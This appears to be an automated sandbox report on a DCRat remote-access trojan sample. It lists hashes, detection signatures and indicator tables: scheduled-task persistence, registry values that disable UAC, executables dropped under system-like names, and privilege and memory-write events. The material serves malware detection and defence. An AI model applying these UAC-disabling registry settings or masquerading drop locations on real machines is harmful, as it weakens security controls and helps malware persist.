dcrat | 366f45d064951e8dd798c64542ef1ee608f501b95f2839e28bfd9fba69cde067

Analysis

max time kernel
150s
max time network
153s
platform
windows7_x64
resource
win7-20231023-en
resource tags

arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system
submitted
06/11/2023, 02:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NEAS.958a297912778bfedf7f5c8f4e270900.exe
Size

1.4MB
MD5

958a297912778bfedf7f5c8f4e270900
SHA1

22d2e9dca6983ba173b6c9e48e22324467454ec2
SHA256

366f45d064951e8dd798c64542ef1ee608f501b95f2839e28bfd9fba69cde067
SHA512

182980b100be670d9598f0ce2fc71fc868a16ed27663f5182297912b8e0deb1464dd00840f5fc663e3495f1f78076dfcf787e5f5f4b99cf9bd02b816486ffdf4
SSDEEP

24576:qBBkOlRe8ZcXPuCyRdaN1yV/vELneAcCg8:uOOy8eEa1Jct8

Score

10^/10

dcrat evasion infostealer rat trojan

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Process spawned unexpected child process 54 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2500	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2856	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2520	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2660	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2540	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2496	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2456	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1144	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2256	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	668	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	844	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2980	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2324	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2344	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2068	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2800	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2164	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1940	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2404	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2176	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1080	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2824	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2816	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1132	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1528	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2120	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2072	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	596	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	584	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	692	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2876	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	588	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2316	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2092	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1064	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1192	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1904	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1444	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1304	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1672	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1828	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1640	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	368	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	964	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	808	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2904	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1740	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1748	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	712	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1760	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1992	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2144	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1604	2616	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2864	2616	schtasks.exe	28

UAC bypass 3 TTPs 12 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	NEAS.958a297912778bfedf7f5c8f4e270900.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	NEAS.958a297912778bfedf7f5c8f4e270900.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	NEAS.958a297912778bfedf7f5c8f4e270900.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe

DCRat payload 14 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral1/memory/2360-0-0x0000000000350000-0x00000000004BC000-memory.dmp	dcrat
behavioral1/files/0x000800000001666b-34.dat	dcrat
behavioral1/files/0x00040000000194a9-133.dat	dcrat
behavioral1/files/0x000900000001930c-158.dat	dcrat
behavioral1/files/0x0008000000016c7f-170.dat	dcrat
behavioral1/files/0x0008000000016cdd-181.dat	dcrat
behavioral1/files/0x000c000000016cfa-227.dat	dcrat
behavioral1/files/0x000a000000012025-288.dat	dcrat
behavioral1/memory/1756-289-0x0000000000360000-0x00000000004CC000-memory.dmp	dcrat
behavioral1/files/0x000a000000012025-287.dat	dcrat
behavioral1/files/0x000a000000012025-438.dat	dcrat
behavioral1/files/0x000c0000000193b3-447.dat	dcrat
behavioral1/files/0x000a000000012025-475.dat	dcrat
behavioral1/files/0x000c0000000193b3-484.dat	dcrat

Executes dropped EXE 3 IoCs

pid	Process
1756	smss.exe
1364	smss.exe
1056	smss.exe

Checks whether UAC is enabled 1 TTPs 8 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	NEAS.958a297912778bfedf7f5c8f4e270900.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	NEAS.958a297912778bfedf7f5c8f4e270900.exe

Drops file in Program Files directory 25 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Microsoft Office\Office14\1033\dwm.exe	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RCXCF65.tmp	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File created	C:\Program Files\Microsoft Games\SpiderSolitaire\en-US\886983d96e3d3e	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File created	C:\Program Files\Windows Portable Devices\winlogon.exe	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\6cb0b6c459d5d3	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File opened for modification	C:\Program Files (x86)\Windows Photo Viewer\de-DE\RCXDFF6.tmp	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\dwm.exe	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\de-DE\services.exe	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File opened for modification	C:\Program Files\Microsoft Games\SpiderSolitaire\en-US\RCXBBB5.tmp	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\de-DE\c5b4cb5e9653cc	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File opened for modification	C:\Program Files\Windows Portable Devices\RCXC29F.tmp	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\1033\RCXC58D.tmp	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\audiodg.exe	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File opened for modification	C:\Program Files (x86)\Windows Photo Viewer\de-DE\RCXE007.tmp	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File created	C:\Program Files\Microsoft Games\SpiderSolitaire\en-US\csrss.exe	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File created	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\audiodg.exe	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RCXCF55.tmp	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File opened for modification	C:\Program Files\Windows Portable Devices\RCXC211.tmp	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File opened for modification	C:\Program Files\Windows Portable Devices\winlogon.exe	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\1033\RCXC59D.tmp	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File created	C:\Program Files\Windows Portable Devices\cc11b995f2a76d	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File opened for modification	C:\Program Files (x86)\Windows Photo Viewer\de-DE\services.exe	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File created	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\42af1c969fbb7b	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File opened for modification	C:\Program Files\Microsoft Games\SpiderSolitaire\en-US\RCXBBB6.tmp	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File opened for modification	C:\Program Files\Microsoft Games\SpiderSolitaire\en-US\csrss.exe	NEAS.958a297912778bfedf7f5c8f4e270900.exe

Drops file in Windows directory 20 IoCs

description	ioc	Process
File created	C:\Windows\tracing\886983d96e3d3e	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File opened for modification	C:\Windows\Tasks\explorer.exe	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File opened for modification	C:\Windows\PCHEALTH\ERRORREP\QHEADLES\RCXD6FA.tmp	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File created	C:\Windows\ShellNew\6cb0b6c459d5d3	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File created	C:\Windows\Tasks\7a0fd90576e088	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File created	C:\Windows\PCHEALTH\ERRORREP\QHEADLES\c5b4cb5e9653cc	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File opened for modification	C:\Windows\PCHEALTH\ERRORREP\QHEADLES\RCXD67C.tmp	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File opened for modification	C:\Windows\tracing\RCXDDE3.tmp	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File opened for modification	C:\Windows\ShellNew\RCXBFED.tmp	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File opened for modification	C:\Windows\ShellNew\dwm.exe	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File opened for modification	C:\Windows\Tasks\RCXD1E7.tmp	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File opened for modification	C:\Windows\tracing\RCXDDE2.tmp	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File created	C:\Windows\ShellNew\dwm.exe	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File created	C:\Windows\tracing\csrss.exe	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File opened for modification	C:\Windows\Tasks\RCXD1D6.tmp	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File opened for modification	C:\Windows\PCHEALTH\ERRORREP\QHEADLES\services.exe	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File opened for modification	C:\Windows\tracing\csrss.exe	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File created	C:\Windows\Tasks\explorer.exe	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File created	C:\Windows\PCHEALTH\ERRORREP\QHEADLES\services.exe	NEAS.958a297912778bfedf7f5c8f4e270900.exe
File opened for modification	C:\Windows\ShellNew\RCXC00E.tmp	NEAS.958a297912778bfedf7f5c8f4e270900.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 54 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2092	schtasks.exe
1940	schtasks.exe
2316	schtasks.exe
1444	schtasks.exe
2904	schtasks.exe
1080	schtasks.exe
844	schtasks.exe
584	schtasks.exe
2856	schtasks.exe
2120	schtasks.exe
1904	schtasks.exe
712	schtasks.exe
2404	schtasks.exe
692	schtasks.exe
1672	schtasks.exe
1760	schtasks.exe
2144	schtasks.exe
2164	schtasks.exe
2324	schtasks.exe
2816	schtasks.exe
1132	schtasks.exe
2980	schtasks.exe
2824	schtasks.exe
1828	schtasks.exe
368	schtasks.exe
2520	schtasks.exe
2876	schtasks.exe
2800	schtasks.exe
2496	schtasks.exe
2068	schtasks.exe
2072	schtasks.exe
1640	schtasks.exe
964	schtasks.exe
2500	schtasks.exe
2456	schtasks.exe
2256	schtasks.exe
1192	schtasks.exe
808	schtasks.exe
2540	schtasks.exe
1144	schtasks.exe
1064	schtasks.exe
1604	schtasks.exe
2864	schtasks.exe
2660	schtasks.exe
1304	schtasks.exe
1748	schtasks.exe
1528	schtasks.exe
1740	schtasks.exe
1992	schtasks.exe
596	schtasks.exe
2344	schtasks.exe
2176	schtasks.exe
588	schtasks.exe
668	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe

Suspicious use of AdjustPrivilegeToken 15 IoCs

description	pid	Process
Token: SeDebugPrivilege	2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe
Token: SeDebugPrivilege	1756	smss.exe
Token: SeDebugPrivilege	2924	powershell.exe
Token: SeDebugPrivilege	2912	powershell.exe
Token: SeDebugPrivilege	2896	powershell.exe
Token: SeDebugPrivilege	1692	powershell.exe
Token: SeDebugPrivilege	2004	powershell.exe
Token: SeDebugPrivilege	2272	powershell.exe
Token: SeDebugPrivilege	1528	powershell.exe
Token: SeDebugPrivilege	564	powershell.exe
Token: SeDebugPrivilege	1336	powershell.exe
Token: SeDebugPrivilege	2304	powershell.exe
Token: SeDebugPrivilege	592	powershell.exe
Token: SeDebugPrivilege	1364	smss.exe
Token: SeDebugPrivilege	1056	smss.exe

Suspicious use of WriteProcessMemory 63 IoCs

description	pid	Process	procid_target
PID 2360 wrote to memory of 592	2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe	83
PID 2360 wrote to memory of 592	2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe	83
PID 2360 wrote to memory of 592	2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe	83
PID 2360 wrote to memory of 2912	2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe	85
PID 2360 wrote to memory of 2912	2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe	85
PID 2360 wrote to memory of 2912	2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe	85
PID 2360 wrote to memory of 2304	2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe	84
PID 2360 wrote to memory of 2304	2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe	84
PID 2360 wrote to memory of 2304	2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe	84
PID 2360 wrote to memory of 564	2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe	96
PID 2360 wrote to memory of 564	2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe	96
PID 2360 wrote to memory of 564	2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe	96
PID 2360 wrote to memory of 2896	2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe	87
PID 2360 wrote to memory of 2896	2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe	87
PID 2360 wrote to memory of 2896	2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe	87
PID 2360 wrote to memory of 2924	2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe	88
PID 2360 wrote to memory of 2924	2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe	88
PID 2360 wrote to memory of 2924	2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe	88
PID 2360 wrote to memory of 2272	2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe	95
PID 2360 wrote to memory of 2272	2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe	95
PID 2360 wrote to memory of 2272	2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe	95
PID 2360 wrote to memory of 3016	2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe	94
PID 2360 wrote to memory of 3016	2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe	94
PID 2360 wrote to memory of 3016	2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe	94
PID 2360 wrote to memory of 1692	2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe	93
PID 2360 wrote to memory of 1692	2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe	93
PID 2360 wrote to memory of 1692	2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe	93
PID 2360 wrote to memory of 1528	2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe	92
PID 2360 wrote to memory of 1528	2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe	92
PID 2360 wrote to memory of 1528	2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe	92
PID 2360 wrote to memory of 2004	2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe	91
PID 2360 wrote to memory of 2004	2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe	91
PID 2360 wrote to memory of 2004	2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe	91
PID 2360 wrote to memory of 1336	2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe	90
PID 2360 wrote to memory of 1336	2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe	90
PID 2360 wrote to memory of 1336	2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe	90
PID 2360 wrote to memory of 1756	2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe	107
PID 2360 wrote to memory of 1756	2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe	107
PID 2360 wrote to memory of 1756	2360	NEAS.958a297912778bfedf7f5c8f4e270900.exe	107
PID 1756 wrote to memory of 1912	1756	smss.exe	110
PID 1756 wrote to memory of 1912	1756	smss.exe	110
PID 1756 wrote to memory of 1912	1756	smss.exe	110
PID 1756 wrote to memory of 2136	1756	smss.exe	111
PID 1756 wrote to memory of 2136	1756	smss.exe	111
PID 1756 wrote to memory of 2136	1756	smss.exe	111
PID 1912 wrote to memory of 1364	1912	WScript.exe	112
PID 1912 wrote to memory of 1364	1912	WScript.exe	112
PID 1912 wrote to memory of 1364	1912	WScript.exe	112
PID 1364 wrote to memory of 2368	1364	smss.exe	113
PID 1364 wrote to memory of 2368	1364	smss.exe	113
PID 1364 wrote to memory of 2368	1364	smss.exe	113
PID 1364 wrote to memory of 1996	1364	smss.exe	114
PID 1364 wrote to memory of 1996	1364	smss.exe	114
PID 1364 wrote to memory of 1996	1364	smss.exe	114
PID 2368 wrote to memory of 1056	2368	WScript.exe	115
PID 2368 wrote to memory of 1056	2368	WScript.exe	115
PID 2368 wrote to memory of 1056	2368	WScript.exe	115
PID 1056 wrote to memory of 2356	1056	smss.exe	116
PID 1056 wrote to memory of 2356	1056	smss.exe	116
PID 1056 wrote to memory of 2356	1056	smss.exe	116
PID 1056 wrote to memory of 1828	1056	smss.exe	117
PID 1056 wrote to memory of 1828	1056	smss.exe	117
PID 1056 wrote to memory of 1828	1056	smss.exe	117

System policy modification 1 TTPs 12 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
